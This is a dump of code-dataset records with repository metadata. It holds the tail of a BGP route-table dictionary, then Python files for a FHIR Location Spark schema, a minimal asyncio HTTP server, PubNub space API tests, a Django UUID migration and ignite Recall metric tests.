'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.171.2.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '10.51.1.101',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'external',
'type_code': 'e'}}},
'10.85.0.0/24':
{'index':
{0:
{'best_code': '>',
'best_path': True,
'in_label': 'nolabel',
'nexthop': '0.0.0.0',
'out_label': 'nolabel',
'status': 'valid',
'status_code': '*',
'type': 'redist',
'type_code': 'r'}}}},
'router_id': '10.1.1.1',
'table_version': 17}}}}}
| 50.112195 | 61 | 0.197703 | 529 | 10,273 | 3.659735 | 0.10586 | 0.046488 | 0.077479 | 0.065083 | 0.909091 | 0.909091 | 0.877066 | 0.817665 | 0.807851 | 0.807851 | 0 | 0.100307 | 0.682663 | 10,273 | 204 | 62 | 50.357843 | 0.493558 | 0 | 0 | 0.80198 | 0 | 0 | 0.20222 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
d1d6a601ddaac5f31d9944ce494f1317d5412dc5 | 21,197 | py | Python | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | 2 | 2020-10-31T23:25:01.000Z | 2021-06-09T14:12:42.000Z | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | null | null | null | spark_fhir_schemas/stu3/complex_types/location.py | icanbwell/SparkFhirSchemas | 8c828313c39850b65f8676e67f526ee92b7d624e | [
"Apache-2.0"
] | null | null | null | from typing import Union, List, Optional
from pyspark.sql.types import StructType, StructField, StringType, ArrayType, DataType
# This file is auto-generated by generate_schema so do not edit manually
# noinspection PyPep8Naming
class LocationSchema:
"""
Details and position information for a physical place where services are
provided and resources and participants may be stored, found, contained or
accommodated.
"""
# noinspection PyDefaultArgument
@staticmethod
def get_schema(
max_nesting_depth: Optional[int] = 6,
nesting_depth: int = 0,
nesting_list: List[str] = [],
max_recursion_limit: Optional[int] = 2,
include_extension: Optional[bool] = False,
extension_fields: Optional[List[str]] = [
"valueBoolean",
"valueCode",
"valueDate",
"valueDateTime",
"valueDecimal",
"valueId",
"valueInteger",
"valuePositiveInt",
"valueString",
"valueTime",
"valueUnsignedInt",
"valueUri",
"valueQuantity",
],
extension_depth: int = 0,
max_extension_depth: Optional[int] = 2,
) -> Union[StructType, DataType]:
"""
Details and position information for a physical place where services are
provided and resources and participants may be stored, found, contained or
accommodated.
id: The logical id of the resource, as used in the URL for the resource. Once
assigned, this value never changes.
extension: May be used to represent additional information that is not part of the basic
definition of the resource. In order to make the use of extensions safe and
manageable, there is a strict set of governance applied to the definition and
use of extensions. Though any implementer is allowed to define an extension,
there is a set of requirements that SHALL be met as part of the definition of
the extension.
meta: The metadata about the resource. This is content that is maintained by the
infrastructure. Changes to the content may not always be associated with
version changes to the resource.
implicitRules: A reference to a set of rules that were followed when the resource was
constructed, and which must be understood when processing the content.
language: The base language in which the resource is written.
text: A human-readable narrative that contains a summary of the resource, and may be
used to represent the content of the resource to a human. The narrative need
not encode all the structured data, but is required to contain sufficient
detail to make it "clinically safe" for a human to just read the narrative.
Resource definitions may define what content should be represented in the
narrative to ensure clinical safety.
contained: These resources do not have an independent existence apart from the resource
that contains them - they cannot be identified independently, and nor can they
have their own independent transaction scope.
resourceType: This is a Location resource
identifier: Unique code or number identifying the location to its users.
status: The status property covers the general availability of the resource, not the
current value which may be covered by the operationStatus, or by a
schedule/slots if they are configured for the location.
operationalStatus: The Operational status covers operation values most relevant to beds (but can
also apply to rooms/units/chair/etc such as an isolation unit/dialisys chair).
This typically covers concepts such as contamination, housekeeping and other
activities like maintenance.
name: Name of the location as used by humans. Does not need to be unique.
alias: A list of alternate names that the location is known as, or was known as in
the past.
description: Description of the Location, which helps in finding or referencing the place.
mode: Indicates whether a resource instance represents a specific location or a
class of locations.
type: Indicates the type of function performed at the location.
telecom: The contact details of communication devices available at the location. This
can include phone numbers, fax numbers, mobile numbers, email addresses and
web sites.
address: Physical location.
physicalType: Physical form of the location, e.g. building, room, vehicle, road.
position: The absolute geographic location of the Location, expressed using the WGS84
datum (This is the same co-ordinate system used in KML).
managingOrganization: The organization responsible for the provisioning and upkeep of the location.
partOf: Another Location which this Location is physically part of.
endpoint: Technical endpoints providing access to services operated for the location.
"""
from spark_fhir_schemas.stu3.complex_types.extension import ExtensionSchema
from spark_fhir_schemas.stu3.complex_types.meta import MetaSchema
from spark_fhir_schemas.stu3.complex_types.narrative import NarrativeSchema
from spark_fhir_schemas.stu3.simple_types.resourcelist import ResourceListSchema
from spark_fhir_schemas.stu3.complex_types.identifier import IdentifierSchema
from spark_fhir_schemas.stu3.complex_types.coding import CodingSchema
from spark_fhir_schemas.stu3.complex_types.codeableconcept import (
CodeableConceptSchema,
)
from spark_fhir_schemas.stu3.complex_types.contactpoint import (
ContactPointSchema,
)
from spark_fhir_schemas.stu3.complex_types.address import AddressSchema
from spark_fhir_schemas.stu3.complex_types.location_position import (
Location_PositionSchema,
)
from spark_fhir_schemas.stu3.complex_types.reference import ReferenceSchema
if (
max_recursion_limit
and nesting_list.count("Location") >= max_recursion_limit
) or (max_nesting_depth and nesting_depth >= max_nesting_depth):
return StructType([StructField("id", StringType(), True)])
# add my name to recursion list for later
my_nesting_list: List[str] = nesting_list + ["Location"]
schema = StructType(
[
# The logical id of the resource, as used in the URL for the resource. Once
# assigned, this value never changes.
StructField("id", StringType(), True),
# May be used to represent additional information that is not part of the basic
# definition of the resource. In order to make the use of extensions safe and
# manageable, there is a strict set of governance applied to the definition and
# use of extensions. Though any implementer is allowed to define an extension,
# there is a set of requirements that SHALL be met as part of the definition of
# the extension.
StructField(
"extension",
ArrayType(
ExtensionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# The metadata about the resource. This is content that is maintained by the
# infrastructure. Changes to the content may not always be associated with
# version changes to the resource.
StructField(
"meta",
MetaSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# A reference to a set of rules that were followed when the resource was
# constructed, and which must be understood when processing the content.
StructField("implicitRules", StringType(), True),
# The base language in which the resource is written.
StructField("language", StringType(), True),
# A human-readable narrative that contains a summary of the resource, and may be
# used to represent the content of the resource to a human. The narrative need
# not encode all the structured data, but is required to contain sufficient
# detail to make it "clinically safe" for a human to just read the narrative.
# Resource definitions may define what content should be represented in the
# narrative to ensure clinical safety.
StructField(
"text",
NarrativeSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# These resources do not have an independent existence apart from the resource
# that contains them - they cannot be identified independently, and nor can they
# have their own independent transaction scope.
StructField(
"contained",
ArrayType(
ResourceListSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# This is a Location resource
StructField("resourceType", StringType(), True),
# Unique code or number identifying the location to its users.
StructField(
"identifier",
ArrayType(
IdentifierSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# The status property covers the general availability of the resource, not the
# current value which may be covered by the operationStatus, or by a
# schedule/slots if they are configured for the location.
StructField("status", StringType(), True),
# The Operational status covers operation values most relevant to beds (but can
# also apply to rooms/units/chair/etc such as an isolation unit/dialisys chair).
# This typically covers concepts such as contamination, housekeeping and other
# activities like maintenance.
StructField(
"operationalStatus",
CodingSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Name of the location as used by humans. Does not need to be unique.
StructField("name", StringType(), True),
# A list of alternate names that the location is known as, or was known as in
# the past.
StructField("alias", ArrayType(StringType()), True),
# Description of the Location, which helps in finding or referencing the place.
StructField("description", StringType(), True),
# Indicates whether a resource instance represents a specific location or a
# class of locations.
StructField("mode", StringType(), True),
# Indicates the type of function performed at the location.
StructField(
"type",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The contact details of communication devices available at the location. This
# can include phone numbers, fax numbers, mobile numbers, email addresses and
# web sites.
StructField(
"telecom",
ArrayType(
ContactPointSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
# Physical location.
StructField(
"address",
AddressSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Physical form of the location, e.g. building, room, vehicle, road.
StructField(
"physicalType",
CodeableConceptSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The absolute geographic location of the Location, expressed using the WGS84
# datum (This is the same co-ordinate system used in KML).
StructField(
"position",
Location_PositionSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# The organization responsible for the provisioning and upkeep of the location.
StructField(
"managingOrganization",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Another Location which this Location is physically part of.
StructField(
"partOf",
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth + 1,
max_extension_depth=max_extension_depth,
),
True,
),
# Technical endpoints providing access to services operated for the location.
StructField(
"endpoint",
ArrayType(
ReferenceSchema.get_schema(
max_nesting_depth=max_nesting_depth,
nesting_depth=nesting_depth + 1,
nesting_list=my_nesting_list,
max_recursion_limit=max_recursion_limit,
include_extension=include_extension,
extension_fields=extension_fields,
extension_depth=extension_depth,
max_extension_depth=max_extension_depth,
)
),
True,
),
]
)
if not include_extension:
schema.fields = [
c
if c.name != "extension"
else StructField("extension", StringType(), True)
for c in schema.fields
]
return schema
| 50.229858 | 107 | 0.562061 | 2,033 | 21,197 | 5.664043 | 0.166749 | 0.063569 | 0.040382 | 0.058359 | 0.802518 | 0.79201 | 0.79201 | 0.760747 | 0.760052 | 0.735736 | 0 | 0.003427 | 0.394207 | 21,197 | 421 | 108 | 50.349169 | 0.89331 | 0.32731 | 0 | 0.640288 | 1 | 0 | 0.027125 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003597 | false | 0 | 0.046763 | 0 | 0.061151 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ae1a6a35679aaf2d03bfc63a1c7d1248b30de98a | 716 | py | Python | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 5,300 | 2015-01-02T08:04:20.000Z | 2022-03-31T10:08:33.000Z | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 3,075 | 2015-01-01T05:11:45.000Z | 2022-03-31T23:56:33.000Z | frameworks/Python/api_hour/yocto_http/hello/servers/yocto_http.py | xsoheilalizadeh/FrameworkBenchmarks | 855527008f7488e4fd508d1e72dfa9953874a2c6 | [
"BSD-3-Clause"
] | 2,151 | 2015-01-02T14:16:09.000Z | 2022-03-30T00:15:26.000Z | import asyncio
import ujson
from ..utils.yocto_http.utils import generate_http_response
class YoctoHttpJson(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
# self.transport.write(data)
payload = ujson.dumps({'message': 'Hello, World!'})
self.transport.write(generate_http_response(payload))
class YoctoHttpText(asyncio.Protocol):
def connection_made(self, transport):
self.transport = transport
def data_received(self, data):
# self.transport.write(data)
payload = 'Hello, World!'
self.transport.write(generate_http_response(payload, 'text/plain; charset=UTF-8')) | 31.130435 | 90 | 0.705307 | 83 | 716 | 5.951807 | 0.373494 | 0.210526 | 0.145749 | 0.11336 | 0.704453 | 0.704453 | 0.704453 | 0.704453 | 0.704453 | 0.481781 | 0 | 0.001712 | 0.184358 | 716 | 23 | 90 | 31.130435 | 0.844178 | 0.074022 | 0 | 0.4 | 1 | 0 | 0.087746 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.266667 | false | 0 | 0.2 | 0 | 0.6 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
ae57076a009da072587b3aec5af8dd03fc5a112a | 4,509 | py | Python | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | 1 | 2021-09-29T05:07:57.000Z | 2021-09-29T05:07:57.000Z | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | null | null | null | tests/integrational/asyncio/test_space.py | panchiwalashivani/python | eacafb9c597d04da3ac306809939045a17611d69 | [
"MIT"
] | null | null | null | import pytest
from tests.helper import pnconf_obj_copy
from tests.integrational.vcr_helper import pn_vcr
from pubnub.pubnub_asyncio import PubNubAsyncio, AsyncioEnvelope
from pubnub.models.consumer.space import (PNGetSpacesResult, PNCreateSpaceResult, PNGetSpaceResult,
PNUpdateSpaceResult, PNDeleteSpaceResult)
from pubnub.models.consumer.common import PNStatus
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/get_spaces.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_get_spaces(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.get_spaces().include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNGetSpacesResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert len(data) == 100
assert set(['name', 'id', 'description', 'custom', 'created', 'updated', 'eTag']) == set(data[0])
assert set(['name', 'id', 'description', 'custom', 'created', 'updated', 'eTag']) == set(data[1])
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/create_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_create_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.create_space().data({'id': 'in_space', 'name': 'some_name',
'custom': {'a': 3}}).include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNCreateSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] is None
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/get_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_get_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.get_space().space_id('in_space').include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNGetSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert set(['name', 'id', 'description', 'created', 'updated', 'eTag', 'custom']) == set(data)
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] is None
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/update_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_update_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
data = {'description': 'desc'}
envelope = yield from pn.update_space().space_id('in_space').data(data).include('custom').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNUpdateSpaceResult)
assert isinstance(envelope.status, PNStatus)
data = envelope.result.data
assert set(['name', 'id', 'description', 'created', 'updated', 'eTag', 'custom']) == set(data)
assert data['id'] == 'in_space'
assert data['name'] == 'some_name'
assert data['custom'] == {'a': 3}
assert data['description'] == 'desc'
@pn_vcr.use_cassette('tests/integrational/fixtures/asyncio/space/delete_space.yaml',
filter_query_parameters=['uuid', 'seqn', 'pnsdk'])
@pytest.mark.asyncio
def test_delete_space(event_loop):
config = pnconf_obj_copy()
pn = PubNubAsyncio(config, custom_event_loop=event_loop)
envelope = yield from pn.delete_space().space_id('in_space').future()
assert(isinstance(envelope, AsyncioEnvelope))
assert not envelope.status.is_error()
assert isinstance(envelope.result, PNDeleteSpaceResult)
assert isinstance(envelope.status, PNStatus)
| 44.205882 | 102 | 0.697937 | 532 | 4,509 | 5.738722 | 0.142857 | 0.044219 | 0.117917 | 0.026204 | 0.811333 | 0.780216 | 0.780216 | 0.780216 | 0.780216 | 0.744841 | 0 | 0.002385 | 0.163007 | 4,509 | 101 | 103 | 44.643564 | 0.806571 | 0 | 0 | 0.611765 | 0 | 0 | 0.165003 | 0.065425 | 0 | 0 | 0 | 0 | 0.435294 | 1 | 0.058824 | false | 0 | 0.070588 | 0 | 0.129412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
882512bc4e2b1e6ea1fcddd04645d589ad79d1ca | 131 | py | Python | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 21 | 2020-04-20T19:10:03.000Z | 2022-03-30T18:46:03.000Z | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 110 | 2020-03-06T22:11:08.000Z | 2022-03-25T20:28:36.000Z | mhkit/river/__init__.py | Matthew-Boyd/MHKiT-Python | 016e9e67dbe1ac1ec24b3a6f8eb2771f73dfefa6 | [
"BSD-3-Clause"
] | 32 | 2020-03-05T20:33:10.000Z | 2022-03-24T20:19:34.000Z | from mhkit.river import performance
from mhkit.river import graphics
from mhkit.river import io
from mhkit.river import resource
| 26.2 | 36 | 0.832061 | 20 | 131 | 5.45 | 0.4 | 0.330275 | 0.513761 | 0.733945 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.137405 | 131 | 4 | 37 | 32.75 | 0.964602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
8845f1744edd987aba8176f97bdfb0192fa42234 | 4,269 | py | Python | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | core/migrations/0033_uuid_all_the_things.py | profesormig/quimica3a | a453f0d7485ebc4b2d7b06a72b44c6c179a3bbd4 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import uuid
class Migration(migrations.Migration):
dependencies = [
('core', '0032_alter_machine_request'),
]
operations = [
migrations.AddField(
model_name='application',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='cloudadministrator',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='identity',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='machinerequest',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='project',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='provider',
name='uuid2',
field=models.UUIDField(null=True),
),
######################################
migrations.AddField(
model_name='allocation',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='atmosphereuser',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='applicationbookmark',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='bootscript',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='credential',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='group',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='identitymembership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancemembership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancesource',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='leadership',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='instancestatushistory',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='license',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='providercredential',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='quota',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='resourcerequest',
name='uuid2',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='size',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='statustype',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AddField(
model_name='tag',
name='uuid',
field=models.UUIDField(null=True),
),
migrations.AlterField(
model_name='machinerequest',
name='uuid',
field=models.CharField(null=True, max_length=36),
),
migrations.AlterField(
model_name='resourcerequest',
name='uuid',
field=models.CharField(null=True, max_length=36),
),
]
| 29.040816 | 61 | 0.510658 | 345 | 4,269 | 6.214493 | 0.171014 | 0.109142 | 0.257463 | 0.302239 | 0.744403 | 0.744403 | 0.744403 | 0.744403 | 0.722948 | 0.722948 | 0 | 0.005885 | 0.363083 | 4,269 | 146 | 62 | 29.239726 | 0.782641 | 0.004919 | 0 | 0.776978 | 0 | 0 | 0.106226 | 0.011169 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.021583 | 0 | 0.043165 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
885698a51ecd161c864ed38d3ee11f132f78738d | 13,677 | py | Python | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | 1 | 2018-12-30T04:11:33.000Z | 2018-12-30T04:11:33.000Z | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | null | null | null | tests/ignite/metrics/test_recall.py | Acidburn0zzz/ignite | 0ea52729740ddd5e2da543527232ad23b0c9c97f | [
"BSD-3-Clause"
] | null | null | null | import pytest
import warnings
from sklearn.metrics import recall_score
from sklearn.exceptions import UndefinedMetricWarning
from ignite.exceptions import NotComputableError
from ignite.metrics import Recall
import torch
torch.manual_seed(12)
def test_no_update():
recall = Recall()
with pytest.raises(NotComputableError):
recall.compute()
def test_binary_wrong_inputs():
re = Recall()
with pytest.raises(ValueError):
# y has not only 0 or 1 values
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.arange(0, 10).type(torch.LongTensor)))
# TODO: Uncomment the following after 0.1.2 release
# with pytest.raises(ValueError):
# # y_pred values are not thresholded to 0, 1 values
# pr.update((torch.rand(10, 1),
# torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.randint(0, 2, size=(10, 5)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10, 5, 6)).type(torch.LongTensor),
torch.randint(0, 2, size=(10,)).type(torch.LongTensor)))
with pytest.raises(ValueError):
# incompatible shapes
re.update((torch.randint(0, 2, size=(10,)).type(torch.LongTensor),
torch.randint(0, 2, size=(10, 5, 6)).type(torch.LongTensor)))
def test_binary_input_N():
# Binary accuracy on input of shape (N, 1) or (N, )
def _test(average):
re = Recall(average=average)
y_pred = torch.rand(10, 1)
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
# y_pred = torch.randint(0, 2, size=(10, )).type(torch.LongTensor)
y_pred = torch.rand(10)
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
assert isinstance(re.compute(), float if average else torch.Tensor)
re_compute = re.compute() if average else re.compute().numpy()
assert recall_score(np_y, np_y_pred, average='binary') == pytest.approx(re_compute)
re.reset()
# TODO: y_pred should be binary after 0.1.2 release
y_pred = torch.Tensor([0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.5, 0.51])
y = torch.randint(0, 2, size=(10,)).type(torch.LongTensor)
re.update((y_pred, y))
np_y = y.numpy().ravel()
# np_y_pred = y_pred.numpy().ravel()
np_y_pred = (y_pred.numpy().ravel() > 0.5).astype('int')
assert re._type == 'binary'
